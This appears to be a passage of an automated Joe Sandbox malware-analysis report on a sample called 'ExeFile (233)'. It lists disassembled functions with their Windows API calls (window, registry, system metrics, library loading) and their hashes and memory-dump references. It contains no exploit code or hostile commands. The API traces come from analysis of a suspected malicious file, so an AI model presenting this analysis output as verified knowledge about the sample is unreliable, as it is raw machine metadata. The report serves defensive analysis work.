                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$AllocLeaveLocalValue$Enter
                                                                  • String ID:
                                                                  • API String ID: 784703316-0
                                                                  • Opcode ID: 594a4808baee31a767fdc62f7c8140403948de5799d907349c6831314b1ca9d7
                                                                  • Instruction ID: 5dddc9971b22e0e1876c0446c64b268f5833d0c7886631e03ddba794b92d443b
                                                                  • Opcode Fuzzy Hash: 594a4808baee31a767fdc62f7c8140403948de5799d907349c6831314b1ca9d7
                                                                  • Instruction Fuzzy Hash: 52319A71700625EFDB20DF56E8C5CAABBA9FF48310B90863EE51A93610C734BD51CB98
                                                                  Function 0040CC2D Relevance: 10.6, APIs: 7, Instructions: 86windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetWindow.USER32(?,00000002), ref: 0040CC48
                                                                  • GetParent.USER32(?), ref: 0040CC59
                                                                  • GetWindow.USER32(?,00000002), ref: 0040CC7C
                                                                  • GetWindow.USER32(?,00000002), ref: 0040CC8E
                                                                  • GetWindowLongA.USER32(?,000000EC), ref: 0040CC9D
                                                                  • IsWindowVisible.USER32(?), ref: 0040CCB7
                                                                  • GetTopWindow.USER32(?), ref: 0040CCDD
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: Window$LongParentVisible
                                                                  • String ID:
                                                                  • API String ID: 506644340-0
                                                                  • Opcode ID: c70ef7d8c11c9b3d2c2ff62202ba04e1108e68c61368e778a638a0a540840f3a
                                                                  • Instruction ID: 9a1c37ed5188bfc8f33535311d62c0bbdcb57dd72d5f2f5136bb94345a51e9fd
                                                                  • Opcode Fuzzy Hash: c70ef7d8c11c9b3d2c2ff62202ba04e1108e68c61368e778a638a0a540840f3a
                                                                  • Instruction Fuzzy Hash: 3D21B631704725EBE7316B66DC89F1B76AC9F44350F450A3AB906B72E1C63CEC0297A8
                                                                  Function 00429DD5 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • RegOpenKeyExA.ADVAPI32(80000001,software,00000000,0002001F,?,?,00000000), ref: 00429E03
                                                                  • RegCreateKeyExA.ADVAPI32(?,00000000,00000000,00000000,00000000,0002001F,00000000,?,?,?,00000000), ref: 00429E26
                                                                  • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?,?,00000000), ref: 00429E42
                                                                  • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00429E52
                                                                  • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00429E5C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: CloseCreate$Open
                                                                  • String ID: software
                                                                  • API String ID: 1740278721-2010147023
                                                                  • Opcode ID: 72d1def7f2d6fdd73a8869adbf3cb73964bbc3421da6f381463cdf1f6bf9f63c
                                                                  • Instruction ID: 4196c354c669fe93409805c9569d3fa6af76ca9127a827bb77615f6dc873523b
                                                                  • Opcode Fuzzy Hash: 72d1def7f2d6fdd73a8869adbf3cb73964bbc3421da6f381463cdf1f6bf9f63c
                                                                  • Instruction Fuzzy Hash: 6B11FB72E00268FBDB21DB96DD84DDFBFBCEF89750F50006AE504A2111D2719E05DB64
                                                                  Function 004051A3 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 62stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 004051E1
                                                                  • GetSystemMetrics.USER32(00000000), ref: 004051F9
                                                                  • GetSystemMetrics.USER32(00000001), ref: 00405200
                                                                  • lstrcpynA.KERNEL32(?,DISPLAY,00000020), ref: 00405226
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: System$Metrics$InfoParameterslstrcpyn
                                                                  • String ID: B$DISPLAY
                                                                  • API String ID: 2307409384-3316187204
                                                                  • Opcode ID: 01cb16e888f42547f2c344bd68f40c19bd14a3463d0f9075f0a2184348a044af
                                                                  • Instruction ID: e98ffc39238d76ad18c2064865fb770f623c726fedb459cf3e2701fb3375c0a4
                                                                  • Opcode Fuzzy Hash: 01cb16e888f42547f2c344bd68f40c19bd14a3463d0f9075f0a2184348a044af
                                                                  • Instruction Fuzzy Hash: 8D11A371601624ABCF219F659C84A5BBBA8EF09740B8044B6FD05BE185D275D801CFE9
                                                                  Function 00427E43 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 58COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetMapMode.GDI32(?,00000000,?,?,?,?,00407746,?), ref: 00427E53
                                                                  • GetDeviceCaps.GDI32(?,00000058), ref: 00427E8D
                                                                  • GetDeviceCaps.GDI32(?,0000005A), ref: 00427E96
                                                                    • Part of subcall function 00425FE0: MulDiv.KERNEL32(00407746,00000000,00000000), ref: 00426020
                                                                    • Part of subcall function 00425FE0: MulDiv.KERNEL32(4689EC45,00000000,00000000), ref: 0042603D
                                                                  • MulDiv.KERNEL32(Fw@,00000060,000009EC), ref: 00427EBA
                                                                  • MulDiv.KERNEL32(00000000,?,000009EC), ref: 00427EC5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: CapsDevice$Mode
                                                                  • String ID: Fw@
                                                                  • API String ID: 696222070-2650048193
                                                                  • Opcode ID: e3170947b1cc198c57297360878fe5df2dbdc7ddbbd9112fc42464f21816eb6e
                                                                  • Instruction ID: fb80d5ef7b3a5028a237277ba05e0f2eaaf9dab0768e1b579059bcf110595a45
                                                                  • Opcode Fuzzy Hash: e3170947b1cc198c57297360878fe5df2dbdc7ddbbd9112fc42464f21816eb6e
                                                                  • Instruction Fuzzy Hash: 1711C235700720AFDB219F55DC44C1FBBA9EF84750752042AF98157360C7759D02CB98
                                                                  Function 00422880 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 34libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00429F15: EnterCriticalSection.KERNEL32(0043F21C,?,00000000,?,?,00429937,00000010,76230A60,00000000,?,?,?,004295F9,004295AC,00428940,004295FF), ref: 00429F43
                                                                    • Part of subcall function 00429F15: InitializeCriticalSection.KERNEL32(00000000,?,00000000,?,?,00429937,00000010,76230A60,00000000,?,?,?,004295F9,004295AC,00428940,004295FF), ref: 00429F55
                                                                    • Part of subcall function 00429F15: LeaveCriticalSection.KERNEL32(0043F21C,?,00000000,?,?,00429937,00000010,76230A60,00000000,?,?,?,004295F9,004295AC,00428940,004295FF), ref: 00429F5E
                                                                    • Part of subcall function 00429F15: EnterCriticalSection.KERNEL32(00000000,00000000,?,?,00429937,00000010,76230A60,00000000,?,?,?,004295F9,004295AC,00428940,004295FF,0041F399), ref: 00429F70
                                                                    • Part of subcall function 00429916: __EH_prolog.LIBCMT ref: 0042991B
                                                                  • LoadLibraryA.KERNEL32(hhctrl.ocx,004290F1,0000000C), ref: 004228A4
                                                                  • GetProcAddress.KERNEL32(00000000,HtmlHelpA), ref: 004228B7
                                                                  • FreeLibrary.KERNEL32(?), ref: 004228C7
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$EnterLibrary$AddressFreeH_prologInitializeLeaveLoadProc
                                                                  • String ID: HtmlHelpA$hhctrl.ocx$|C
                                                                  • API String ID: 813623328-2960013086
                                                                  • Opcode ID: 76f3623a875863b6600950783369de3e50677ae7417989a49c3df338fd27278c
                                                                  • Instruction ID: 8ff148b5d027a1bd9c09299d9886496cc310a26e86ad88824c01f6ca9606dbec
                                                                  • Opcode Fuzzy Hash: 76f3623a875863b6600950783369de3e50677ae7417989a49c3df338fd27278c
                                                                  • Instruction Fuzzy Hash: A6F04430344311EFD7606F72EE09B177AD4AF08B15F40892EF05BD15A0DBB8C844972A
                                                                  Function 0042547E Relevance: 10.5, APIs: 7, Instructions: 29COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetSysColor.USER32(0000000F), ref: 0042548A
                                                                  • GetSysColor.USER32(00000010), ref: 00425491
                                                                  • GetSysColor.USER32(00000014), ref: 00425498
                                                                  • GetSysColor.USER32(00000012), ref: 0042549F
                                                                  • GetSysColor.USER32(00000006), ref: 004254A6
                                                                  • GetSysColorBrush.USER32(0000000F), ref: 004254B3
                                                                  • GetSysColorBrush.USER32(00000006), ref: 004254BA
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: Color$Brush
                                                                  • String ID:
                                                                  • API String ID: 2798902688-0
                                                                  • Opcode ID: 5e9fe926aba121c93cda4fa03a08df81998be73ca4ec86a4fc7898ccbcd5bfd0
                                                                  • Instruction ID: 78561b53b6dc26605db7459fdb8494e68ce8eabe85823d8095c3e3f311011118
                                                                  • Opcode Fuzzy Hash: 5e9fe926aba121c93cda4fa03a08df81998be73ca4ec86a4fc7898ccbcd5bfd0
                                                                  • Instruction Fuzzy Hash: 2BF0F871A407489BD730BB729D09B47BAE1FFC4B10F02092EE2818BA90E6B6E0419F44
                                                                  Function 00427ED1 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 24registrywindowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: Version$MessageRegisterWindow
                                                                  • String ID: MSWHEEL_ROLLMSG
                                                                  • API String ID: 303823969-2485103130
                                                                  • Opcode ID: 05bd7beb7a7556ba018a9a177a96ae2ca3a30c583be59b7c1ae453c514f770bd
                                                                  • Instruction ID: cf2be246d5d97fda33aa8db455070e9bef683d48ca9bcd61a13d8190e2691888
                                                                  • Opcode Fuzzy Hash: 05bd7beb7a7556ba018a9a177a96ae2ca3a30c583be59b7c1ae453c514f770bd
                                                                  • Instruction Fuzzy Hash: 38E0803AA0D13546D7116764BE4476B66A45B54361FD6007BC90143764976C0C878A7E
                                                                  Function 0040EF6B Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 13libraryloaderCOMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(mscoree.dll,0040F0D9,?,00431AC0,00000008,0040F110,?,00000001,00000000,00412FBC,00000003), ref: 0040EF70
                                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0040EF80
                                                                  • ExitProcess.KERNEL32 ref: 0040EF94
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: AddressExitHandleModuleProcProcess
                                                                  • String ID: CorExitProcess$`#vp,$v$mscoree.dll
                                                                  • API String ID: 75539706-2710989135
                                                                  • Opcode ID: fd8063930fbf66e5889c8e5221376f06f177b086132e45f551b3fdf05346e537
                                                                  • Instruction ID: 941fb14b8e6e74046c3674dea832eee8b0a2cfa7b7099c50836eeb20d6140e2c
                                                                  • Opcode Fuzzy Hash: fd8063930fbf66e5889c8e5221376f06f177b086132e45f551b3fdf05346e537
                                                                  • Instruction Fuzzy Hash: 0FD0C730705301BFD7106B63DC0DF1A3A58AE44B05B485D357446D01B0CF74C851E52D
                                                                  Function 0040C22B Relevance: 9.4, APIs: 6, Instructions: 384COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 0040C230
                                                                  • VariantClear.OLEAUT32(?), ref: 0040C292
                                                                  • VariantClear.OLEAUT32(00000007), ref: 0040C5C0
                                                                  • VariantClear.OLEAUT32(?), ref: 0040C735
                                                                    • Part of subcall function 0040D77F: VariantCopy.OLEAUT32(?,?), ref: 0040D787
                                                                    • Part of subcall function 00408A64: SystemTimeToVariantTime.OLEAUT32(?), ref: 00408AB2
                                                                  • VariantClear.OLEAUT32(?), ref: 0040C715
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: Variant$Clear$Time$CopyH_prologSystem
                                                                  • String ID:
                                                                  • API String ID: 2075586698-0
                                                                  • Opcode ID: 1364f7f1f86d658b4d6e8cd494515ac68c753655f9690c10ced3c2c88684c333
                                                                  • Instruction ID: 6ab10ce611a99a1f8f361261b98790ac6c7d0aa24a7c23b9a0ac30f561102aa8
                                                                  • Opcode Fuzzy Hash: 1364f7f1f86d658b4d6e8cd494515ac68c753655f9690c10ced3c2c88684c333
                                                                  • Instruction Fuzzy Hash: BCE12B7580011CEACF15EB94C991AFEBB79BF18304F0441ABF845B32D1EB385A49DB69
                                                                  Function 004155CE Relevance: 9.1, APIs: 6, Instructions: 145COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetStringTypeW.KERNEL32(00000001,004322C4,00000001,?,004322F0,0000001C,0040FB4A,00000001,00000020,00000100,?,00000000), ref: 004155F2
                                                                  • GetLastError.KERNEL32 ref: 00415604
                                                                  • MultiByteToWideChar.KERNEL32(?,00000000,00000000,0040FE1B,00000000,00000000,004322F0,0000001C,0040FB4A,00000001,00000020,00000100,?,00000000), ref: 00415666
                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,00000000,0040FE1B,?,00000000), ref: 004156E4
                                                                  • GetStringTypeW.KERNEL32(00000000,?,00000000,?,?,00000000), ref: 004156F6
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharMultiStringTypeWide$ErrorLast
                                                                  • String ID:
                                                                  • API String ID: 3581945363-0
                                                                  • Opcode ID: 1d6e66a6560f70aff42be1d47028f91ef8b4c7634ef11d4c805a64f0cb85e88e
                                                                  • Instruction ID: a1f57d75a495807adbd5f9f81b07e7c36f1fa25e7f2b40525a61db36998abfa5
                                                                  • Opcode Fuzzy Hash: 1d6e66a6560f70aff42be1d47028f91ef8b4c7634ef11d4c805a64f0cb85e88e
                                                                  • Instruction Fuzzy Hash: CC41E231900A15EBCF219F51DC46EEF7B75FF88760F14052AF814A6290D7388991DBE8
                                                                  Function 0040C753 Relevance: 9.1, APIs: 6, Instructions: 137COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 0040C758
                                                                  • VariantClear.OLEAUT32(?), ref: 0040C80A
                                                                  • SysFreeString.OLEAUT32(00000000), ref: 0040C88B
                                                                  • SysFreeString.OLEAUT32(00000000), ref: 0040C89A
                                                                  • SysFreeString.OLEAUT32(00000000), ref: 0040C8A9
                                                                  • VariantClear.OLEAUT32(00000000), ref: 0040C8BE
                                                                    • Part of subcall function 0040C22B: __EH_prolog.LIBCMT ref: 0040C230
                                                                    • Part of subcall function 0040C22B: VariantClear.OLEAUT32(?), ref: 0040C292
                                                                    • Part of subcall function 0040D77F: VariantCopy.OLEAUT32(?,?), ref: 0040D787
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: Variant$ClearFreeString$H_prolog$Copy
                                                                  • String ID:
                                                                  • API String ID: 3098219910-0
                                                                  • Opcode ID: 979a942dbc2bf8fde55d4df949cd0def5ce3ee024a13b008bae821c373d48dc3
                                                                  • Instruction ID: 36662450c5e1947f06e528152222194ba2e0adfdc782b58db195a1114ff86cd1
                                                                  • Opcode Fuzzy Hash: 979a942dbc2bf8fde55d4df949cd0def5ce3ee024a13b008bae821c373d48dc3
                                                                  • Instruction Fuzzy Hash: 33512AB1A00209DFDB24DFA4C884BEEB7B8FF44305F10462EE516E7291D778A945CB68
                                                                  Function 00426ED9 Relevance: 9.1, APIs: 6, Instructions: 68COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetWindowLongA.USER32(?,000000F0), ref: 00426F0B
                                                                  • GetParent.USER32(?), ref: 00426F19
                                                                  • GetParent.USER32(?), ref: 00426F2C
                                                                  • GetLastActivePopup.USER32(?), ref: 00426F3B
                                                                  • IsWindowEnabled.USER32(?), ref: 00426F50
                                                                  • EnableWindow.USER32(?,00000000), ref: 00426F63
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
                                                                  • String ID:
                                                                  • API String ID: 670545878-0
                                                                  • Opcode ID: e6b9fbe2978fe384cc6369b478063f7d970489e6a0ea732f4327e87d7b57f048
                                                                  • Instruction ID: 07f23732e05c0ddae676fdba191ad6f2f3c3259ccd052a946048ec3c933e7ffc
                                                                  • Opcode Fuzzy Hash: e6b9fbe2978fe384cc6369b478063f7d970489e6a0ea732f4327e87d7b57f048
                                                                  • Instruction Fuzzy Hash: 0411063230823157CE316A5A7E40B2BB29C5F68B50FC7002BED10D3304EB28CC0246DD
                                                                  Function 004266BB Relevance: 9.0, APIs: 6, Instructions: 45COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ClientToScreen.USER32(?,?), ref: 004266CA
                                                                  • GetDlgCtrlID.USER32(00000000), ref: 004266DE
                                                                  • GetWindowLongA.USER32(00000000,000000F0), ref: 004266EC
                                                                  • GetWindowRect.USER32(00000000,?), ref: 004266FE
                                                                  • PtInRect.USER32(?,?,?), ref: 0042670E
                                                                  • GetWindow.USER32(?,00000005), ref: 0042671B
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: Window$Rect$ClientCtrlLongScreen
                                                                  • String ID:
                                                                  • API String ID: 1315500227-0
                                                                  • Opcode ID: 59508210cca9db84bfe781cdbc9e2c47ff541434b0194dd008954dc1c14c9765
                                                                  • Instruction ID: 83608b20ab5d7acfc5f4007f6359faa5a2816e21795921f9c93a6bd5c83018c8
                                                                  • Opcode Fuzzy Hash: 59508210cca9db84bfe781cdbc9e2c47ff541434b0194dd008954dc1c14c9765
                                                                  • Instruction Fuzzy Hash: 2F018F35300125ABDB21AF56AC08EAF3B68AF44751F810026F91193190DB34D9028BA8
                                                                  Function 00415BE4 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 121COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: B
                                                                  • API String ID: 0-2386870291
                                                                  • Opcode ID: 02d30d9259a4a2bad5bd7c57acdfbd4e8b1d24c0360f644a24d44c51bf277f00
